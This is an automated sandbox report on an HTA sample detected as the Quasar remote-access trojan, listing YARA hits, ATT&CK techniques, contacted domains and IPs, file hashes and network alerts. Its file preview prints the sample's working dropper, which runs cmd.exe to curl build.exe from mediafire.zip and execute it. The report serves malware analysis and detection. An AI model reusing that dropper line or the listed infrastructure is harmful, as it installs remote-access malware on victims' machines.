Detected Quasar RAT

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Mutex created: \Sessions\1\BaseNamedObjects\QSR_MUTEX_DT5aFgoH5h6bbtKq7Q

Jump to behavior

Yara detected Quasar RAT

Source: Yara match	File source: 5.2.build.exe.64179a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.csc.exe.4800000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.64179a.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.1060000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.build.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: build.exe PID: 7720, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: csc.exe PID: 8136, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	1 DLL Side-Loading	311 Process Injection	1 Masquerading	11 Input Capture	1 System Time Discovery	Remote Services	1 Email Collection	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Disable or Modify Tools	LSASS Memory	111 Security Software Discovery	Remote Desktop Protocol	11 Input Capture	1 Non-Standard Port	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Archive Collected Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	311 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Hidden Files and Directories	LSA Secrets	1 System Network Configuration Discovery	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Obfuscated Files or Information	Cached Domain Credentials	1 File and Directory Discovery	VNC	GUI Input Capture	113 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Software Packing	DCSync	24 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 DLL Side-Loading	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
build.hta	0%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\Desktop\build.exe	16%	ReversingLabs
C:\Users\user\Desktop\build.exe	20%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
ip-api.com	0%	Virustotal		Browse
roblox.airdns.org	3%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens	0%	Avira URL Cloud	safe
http://www.foobar2000.org/FAQ.htmlCould	0%	Avira URL Cloud	safe
http://freegeoip.net/xml/	0%	Avira URL Cloud	safe
https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:	0%	Avira URL Cloud	safe
http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Avira URL Cloud	safe
http://www.foobar2000.org/FAQ.html	0%	Avira URL Cloud	safe
http://freegeoip.net/xml/	0%	Virustotal		Browse
https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens	0%	Virustotal		Browse
http://www.foobar2000.org/FAQ.htmlCould	0%	Virustotal		Browse
http://forums.foobar2000.org/	0%	Avira URL Cloud	safe
http://schemas.datacontract.org/2004/07/	0%	Virustotal		Browse
http://forums.foobar2000.org/	0%	Virustotal		Browse
http://www.foobar2000.org/FAQ.html	0%	Virustotal		Browse
https://www.foobar2000.org/license	0%	Virustotal		Browse
http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file	0%	Virustotal		Browse
https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:	0%	Virustotal		Browse
https://www.foobar2000.org/license	0%	Avira URL Cloud	safe
https://mediafire.zip/build.exep	0%	Avira URL Cloud	safe
https://mediafire.zip/build.exe-obuild.exei	0%	Avira URL Cloud	safe
https://mediafire.zip/build.exem	0%	Avira URL Cloud	safe
https://mediafire.zip/build.exe	0%	Avira URL Cloud	safe
http://wiki.hydrogenaudio.org/index.php?title=Replaygain	0%	Avira URL Cloud	safe
OuB3'!fy.	0%	Avira URL Cloud	safe
http://ip-api.com	0%	Avira URL Cloud	safe
http://ip-api.com/json/	0%	Avira URL Cloud	safe
http://api.ipify.org/	0%	Avira URL Cloud	safe
https://mediafire.zip/build.exe	0%	Virustotal		Browse
http://wiki.hydrogenaudio.org/index.php?title=Replaygain	0%	Virustotal		Browse
http://ip-api.com/json/	0%	Virustotal		Browse
https://www.foobar2000.org/download	0%	Avira URL Cloud	safe
https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre	0%	Avira URL Cloud	safe
http://api.ipify.org/	1%	Virustotal		Browse
https://www.foobar2000.org/	0%	Avira URL Cloud	safe
http://schemas.microsof	0%	Avira URL Cloud	safe
http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet	0%	Avira URL Cloud	safe
https://www.foobar2000.org/	0%	Virustotal		Browse
http://help.foobar2000.org/	0%	Avira URL Cloud	safe
https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre	0%	Virustotal		Browse
http://help.foobar2000.org/	0%	Virustotal		Browse
https://www.foobar2000.org/download	0%	Virustotal		Browse
http://ip-api.com	0%	Virustotal		Browse
http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
mediafire.zip	172.67.195.64	true	true		unknown
roblox.airdns.org	64.42.179.59	true	false	3%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://mediafire.zip/build.exe	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
OuB3'!fy.	true	Avira URL Cloud: safe	unknown
http://ip-api.com/json/	true	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://help.foobar2000.org/filesystem::g_get_canonical_pathfilesystem::g_list_directoryunpack://file	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://freegeoip.net/xml/	build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.foobar2000.org/licensehttps://www.foobar2000.org/http://forums.foobar2000.org/AboutOpens	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.foobar2000.org/FAQ.htmlCould	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.foobar2000.org/downloadportablestandardquietcrashednoguisafeinstallfoobar2000.exe:	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.datacontract.org/2004/07/	csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.foobar2000.org/FAQ.html	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://forums.foobar2000.org/	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.foobar2000.org/license	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://mediafire.zip/build.exep	curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mediafire.zip/build.exe-obuild.exei	curl.exe, 00000004.00000002.1756723247.0000000002710000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://mediafire.zip/build.exem	curl.exe, 00000004.00000003.1756384519.0000000002744000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000003.1756502997.0000000002745000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000004.00000002.1756850133.0000000002745000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://wiki.hydrogenaudio.org/index.php?title=Replaygain	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://ip-api.com	csc.exe, 00000009.00000002.2971577534.0000000006AAC000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://api.ipify.org/	build.exe, build.exe, 00000005.00000002.2033326189.0000000000641000.00000040.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000002.2033782285.0000000001062000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2969335859.0000000004802000.00000040.00000400.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	csc.exe, 00000009.00000002.2971577534.0000000006A99000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.foobar2000.org/download	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.foobar2000.org/downloadcomponent_manager::on_app_initPre	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.foobar2000.org/	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.microsof	build.exe	false	Avira URL Cloud: safe	unknown
http://wiki.hydrogenaudio.org/index.php?title=ReplaygainSet	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://help.foobar2000.org/	build.exe, 00000005.00000002.2033055187.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe, 00000005.00000000.1757940215.00000000005B4000.00000002.00000001.01000000.0000000B.sdmp, build.exe.4.dr	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
64.42.179.59	roblox.airdns.org	United States	63018	DEDICATEDUS	false
172.67.195.64	mediafire.zip	United States	13335	CLOUDFLARENETUS	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1454170
Start date and time:	2024-06-09 01:25:08 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 33s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	11
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	build.hta
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winHTA@10/3@3/4
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 80% Number of executed functions: 48 Number of non-executed functions: 12
Cookbook Comments:	Found application associated with file extension: .hta

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target mshta.exe, PID 7456 because there are no executed function
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
19:26:38	API Interceptor	1417904x Sleep call for process: csc.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	build.exe	Get hash	malicious	Quasar	Browse	ip-api.com/json/
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/?fields=hosting
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	ip-api.com/line/?fields=hosting
	fix.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	ip-api.com/json/?fields=225545
	PO.docx.doc	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	ac#U03c2.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	PYT W2471234-MLIG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	staff record or employee record.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
	rlytKovocev.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	ip-api.com/line/?fields=hosting
64.42.179.59	build.exe	Get hash	malicious	Quasar	Browse
172.67.195.64	http://ihealthcovidtest.com	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
roblox.airdns.org	build.exe	Get hash	malicious	Quasar	Browse	64.42.179.59
ip-api.com	build.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	fix.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	PO.docx.doc	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PYT W2471234-MLIG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	staff record or employee record.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rlytKovocev.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
DEDICATEDUS	build.exe	Get hash	malicious	Quasar	Browse	64.42.179.59
	Replace.exe	Get hash	malicious	Unknown	Browse	74.201.73.52
	x1b5bmJgLm.elf	Get hash	malicious	Unknown	Browse	200.220.163.225
	0FnrrE8B6Y.elf	Get hash	malicious	Mirai	Browse	168.81.61.232
	D2M15lCoQK.elf	Get hash	malicious	Mirai	Browse	45.74.57.45
	CGlwOBF2cH.elf	Get hash	malicious	Unknown	Browse	45.74.57.32
	SecuriteInfo.com.Win32.Trojan.CobaltStrike.4EYNH5.5772.17622.dll	Get hash	malicious	CobaltStrike	Browse	64.42.181.227
	VlkShT2TjD.elf	Get hash	malicious	Gafgyt	Browse	172.83.131.72
	Enrollment PO, from United Way of the Midlands.eml	Get hash	malicious	Unknown	Browse	216.105.168.10
	9Dcya2QOaQ.elf	Get hash	malicious	Mirai	Browse	14.1.28.237
TUT-ASUS	build.exe	Get hash	malicious	Quasar	Browse	208.95.112.1
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	ZLsIkKPtLQ.exe	Get hash	malicious	Unknown	Browse	208.95.112.1
	fix.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	208.95.112.1
	PO.docx.doc	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	ac#U03c2.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	PYT W2471234-MLIG.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	staff record or employee record.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	4ef10e7296fb6c5df039a4b95147b1cb4482bdbee0a097863fe345b295302cc9_dump.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	rlytKovocev.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
CLOUDFLARENETUS	https://pub-d8d7ac311b234607a98f38098cb878d2.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.18.3.35
	http://proteger-aqui356.hstn.me/	Get hash	malicious	Unknown	Browse	104.20.95.138
	https://profound-beignet-562245.netlify.app/appeal.html/	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://afdf.daftardanafisik.my.id/	Get hash	malicious	Unknown	Browse	104.21.63.254
	https://group4.my-ste.icu/	Get hash	malicious	Unknown	Browse	188.114.96.3
	https://page-timeteshn.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	172.66.47.80
	https://support-team-t440706-44xeo12.netlify.app/form	Get hash	malicious	Unknown	Browse	104.16.117.116
	http://pub-97c8902c9c3b4ec0b4a2b0568cedcfd6.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	https://scintillating-cosmic-id4964-01e85b6.netlify.app/form	Get hash	malicious	Unknown	Browse	104.16.117.116
	https://pub-c2aa174758aa43ea80a0607fa6195767.r2.dev/index.html	Get hash	malicious	Unknown	Browse	104.18.3.35

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
74954a0c86284d0d6e1c4efefe92b521	ZK9XFb424l.exe	Get hash	malicious	Python Stealer, Creal Stealer, XWorm	Browse	172.67.195.64
	Chasebank_Statement_May lnk.lnk	Get hash	malicious	Unknown	Browse	172.67.195.64
	N-WITHERSPOON-46151.js	Get hash	malicious	Unknown	Browse	172.67.195.64
	N-WITHERSPOON-86707.js	Get hash	malicious	Unknown	Browse	172.67.195.64
	N-WITHERSPOON-46151.js	Get hash	malicious	Unknown	Browse	172.67.195.64
	N-WITHERSPOON-86707.js	Get hash	malicious	Unknown	Browse	172.67.195.64
	wells_fargo_statement lnk.lnk	Get hash	malicious	Unknown	Browse	172.67.195.64
	TS-240531-UF1-Creal.exe	Get hash	malicious	Python Stealer, Creal Stealer	Browse	172.67.195.64
	Chasebank_Statement_May.lnk	Get hash	malicious	Unknown	Browse	172.67.195.64
	ccsetup624.exe	Get hash	malicious	Unknown	Browse	172.67.195.64

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	data
Category:	modified
Size (bytes):	224
Entropy (8bit):	7.154213125076343
Encrypted:	false
SSDEEP:	6:owxlcZoyb8a9tCMUtNDScNR9bheHyxQKNN:oElcqwiCLHyfD
MD5:	F9603F0321B023CB89A0DC3FE18C5EC2
SHA1:	A36305FD3FD12539D59CF62CD4C5DDA3175BCD49
SHA-256:	45E25B67711C438FB0B3523A74F492F681144E38BDACC47C7B9E9015BCB4A4B4
SHA-512:	05E7490E8A1E70B4FE10153B9BF08610E051B5AEABCD0E27048A7B2A4BC41E6AA8BF90611BEF7D5064B0460B6FA8F2C8AC6CA3F7D0AEC2B48C7A540CCEFEE1D3
Malicious:	false
Reputation:	low
Preview:	_&1.78^ ....k..q,.K..y.&e...y<.#..s.0..I..x...O.) :.sy.c.ROy...`6....T.@!z..4.._....)Di..}.e..Wx....$).!.f@..=..G..a.......s.d...-.I..Y..H.a.!...W.C....#T>.....A.._..~G8......\.L=...{..p..+bZr...mW.[.w...S.\.1.

C:\Users\user\Desktop\build.exe

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	3124224
Entropy (8bit):	6.828488553975669
Encrypted:	false
SSDEEP:	49152:rBT0kcpBrQvDFw/Wb/Zy8kIvLSXkbPvEZNLlUHDZQ:rdcf8i/2/Zy8kIO10Q
MD5:	05EECFC1820AB3273409323601A71F23
SHA1:	5076D5C3A1AA6F2FFCC299F803D0DD01B33D6DD7
SHA-256:	4A72F3948F014C2DED502832814C6D65FEB78BD1CAEF7DF8BCECB78F7A90B6E2
SHA-512:	81D10658AAF6D6341B929DCDB1ECCD97DD752B7CBE7B497ED85B88A03EA540A2DE6B24AE98ACE353E861D1EA7AD181449E332DEC26B075C4684C7286CC167A00
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 16% Antivirus: Virustotal, Detection: 20%, Browse
Reputation:	low
Preview:	MZ......................@...................................8...........!..L.!This program cannot be run in DOS mode....$........j.l...?...?...?.s.?...?.d.?...?.~.>...?.~.>...?.~.>...?.W.?...?.~.>...?S+.?...?.~.>...?.c.>...?.c.>...?.c.>...?.c.>...?...?...?.~.>...?.~.?...?..{?...?.~.>...?Rich...?................PE..L...gb.`..........".........~......./.......@....@..........................@0......6%...@................................... .......#.L.....................%.\....a..p....................b.......U..@............@........ .`....................text....0......................... ..`.rdata... ...@......................@..@.data........` ......J .............@..._RDATA...0...p!..,.... .............@..@.rsrc...L.....#.......#.............@..@................................................................................................................................................................................................................................................

\Device\ConDrv

Download File

Process:	C:\Windows\SysWOW64\curl.exe
File Type:	ASCII text, with CR, LF line terminators
Category:	dropped
Size (bytes):	399
Entropy (8bit):	3.4602320657646954
Encrypted:	false
SSDEEP:	6:I2swj2SAykymUeg/8Uni1qSgOgcOVhF5153ziqd/qkwI7Uo:Vz6ykymUexb1U9cOTFPsI/17Uo
MD5:	19877D7AD4EFBF92907042431F8F3EA3
SHA1:	CAF7C791716729AE0EDF325E5D838710E175D55F
SHA-256:	E56707C19893CFB0D3E3E6B1A48D22FA62C60107259096EFCD63AC26BDE5287F
SHA-512:	E38B259CE66E3EDCF941677FDF7D63A8B353B844C815B96856A01E1DF44AC6CA660F4F74C05347926C7EA371834A1F3733CF66C1AF676E93D90B1D3A726F5665
Malicious:	false
Reputation:	low
Preview:	% Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 3051k 0 2036 0 0 2333 0 0:22:19 --:--:-- 0:22:19 2334.100 3051k 100 3051k 0 0 1737k 0 0:00:01 0:00:01 --:--:-- 1739k..

Static File Info

General

File type:	HTML document, ASCII text
Entropy (8bit):	4.825399307820561
TrID:	HTML Application (8008/1) 100.00%
File name:	build.hta
File size:	173 bytes
MD5:	81d631fdb7e6f1d8b2222355bdea0d92
SHA1:	fc5a81c0b9df522b041caf2557f152514ccfcd5c
SHA256:	d5647dd8dbd73ac01bad18aefafab4b7848861c12eaff129b37f65cfc940575d
SHA512:	1baab86587eeef814752265b1d340e41f0063b19621e184cdc2a8fb7b7471587b35f00cace53e24ebd1d2bbb287836cd24eb6fa04863332e486a5dce3d1023ec
SSDEEP:	3:gH//sG2iMILN/zqp9Np4HWfSqMefFJBhBX/ozSZeYLn:FqrN/up9XrfS3ebNvoVYL
TLSH:	84C012764C9F807EB26B42D59632A38CD1938C62F080D42172088D802E134A1667E9A5
File Content Preview:	<script>. l = new ActiveXObject("WScript.Shell");. l.run("cmd.exe /c curl -L https://mediafire.zip/build.exe -o build.exe & build.exe");. window.close();.</script>.

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/09/24-01:26:38.405968	TCP	2036383	ET TROJAN Common RAT Connectivity Check Observed	49746	80	192.168.2.4	208.95.112.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 9, 2024 01:26:06.790723085 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:06.790775061 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:06.790864944 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:06.842948914 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:06.843004942 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.450149059 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.450238943 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.456070900 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.456098080 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.456408024 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.459964991 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.500497103 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.595808983 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.595931053 CEST	443	49733	172.67.195.64	192.168.2.4
Jun 9, 2024 01:26:07.595999956 CEST	49733	443	192.168.2.4	172.67.195.64
Jun 9, 2024 01:26:07.596018076 CEST	443	49733	172.67.195.64	192.168.2.4
